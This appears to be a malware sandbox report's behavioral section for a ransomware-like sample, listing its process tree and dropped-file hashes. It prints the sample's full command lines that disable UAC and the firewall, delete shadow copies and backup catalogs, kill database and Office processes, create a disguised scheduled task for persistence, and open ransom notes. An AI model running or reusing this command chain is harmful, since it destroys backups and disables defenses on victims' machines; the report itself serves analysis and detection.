C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:620
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:4608
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:4476
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:2308
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1804
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:2996
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:4900
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:3080
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:2620
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1692
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:2028
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:3152
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:3668
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:5108
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1052
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:2156
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:612
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:2332
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1560
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1556
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:3016
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1180
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:4380
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1112
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:2124
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1804
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:4364
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 90 /nobreak5⤵
- Delays execution with timeout.exe
PID:5100
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵PID:4408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:2064
-
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:2484
-
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:3396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵PID:3868
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵PID:5028
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:2796
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:5060
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:3632
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵PID:4376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
PID:3756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
PID:1232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
PID:1112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
PID:1080
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
PID:4148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
PID:3040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
PID:4412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
PID:4360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
PID:4344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
PID:1032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
PID:932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
PID:2608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
PID:3528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
PID:1456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
PID:2836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
PID:3160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
PID:4660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
PID:2392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
PID:3620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
PID:3468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe2⤵PID:4452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
PID:1628
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt2⤵PID:4728
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt2⤵PID:4144
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4036
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll
Filesize1.7MB
MD5c606bd7c9c733dd27f74157c34e51742
SHA1aab92689723449fbc3e123fb614dd536a74b74d4
SHA256606390649012b31b5d83630f1186562e4b1ce4023d8870d8c29eb62e7e0769e0
SHA5125f8fabe3d9753413d1aedcc76b9568c50dd25a5a6aeacd1ce88aecc28c0ba96dac80177679d380708213a0997946e49383bdaca7114c8c9526a24ed999194e38
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
Filesize613KB
MD5c1b066f9e3e2f3a6785161a8c7e0346a
SHA18b3b943e79c40bc81fdac1e038a276d034bbe812
SHA25699e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd
SHA51236f9e6c86afbd80375295238b67e4f472eb86fcb84a590d8dba928d4e7a502d4f903971827fdc331353e5b3d06616664450759432fdc8d304a56e7dacb84b728
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
Filesize83KB
MD51453290db80241683288f33e6dd5e80e
SHA129fb9af50458df43ef40bfc8f0f516d0c0a106fd
SHA2562b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c
SHA5124ea48a11e29ea7ac3957dcab1a7912f83fd1c922c43d7b7d78523178fe236b4418729455b78ac672bb5632ecd5400746179802c6a9690adb025270b0ade84e91
-
Filesize
1KB
MD5f9f261a411dd279fdf572a7b85ad3c35
SHA1aa4c4ab38c5199b8f00314e2610e7ef420fd5542
SHA25666607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec
SHA512e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202
-
Filesize
1KB
MD54d428091b2808d90b7945c27b2c23a04
SHA1d74afbc10ad68549bb9b27132b573d980785c2a7
SHA25600eb0cf67c2cfa7f93b67c3320e897effb70d022dce30a40a70f044a4d9518e2
SHA51290ec5493e498dc102ad22f708a8fd334e9f4311101f5534f99c5fd773d9e9db9441832942eefdfefb8d32c223635bcfa6af79b5cef47508adb7afe3c5b4a18a7
-
Filesize
138B
MD5702f5dc6f9dec28c8c9b7b6885c9fe09
SHA1dbb85da6de899deb21ce0a8f25c1726cd19e49e8
SHA25620bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
SHA512fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7
-
Filesize
686B
MD5e9c50acda9063b2462697bdbd0a0dfe2
SHA1d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
SHA256f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
SHA512d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9
-
Filesize
1KB
MD5f9f261a411dd279fdf572a7b85ad3c35
SHA1aa4c4ab38c5199b8f00314e2610e7ef420fd5542
SHA25666607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec
SHA512e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202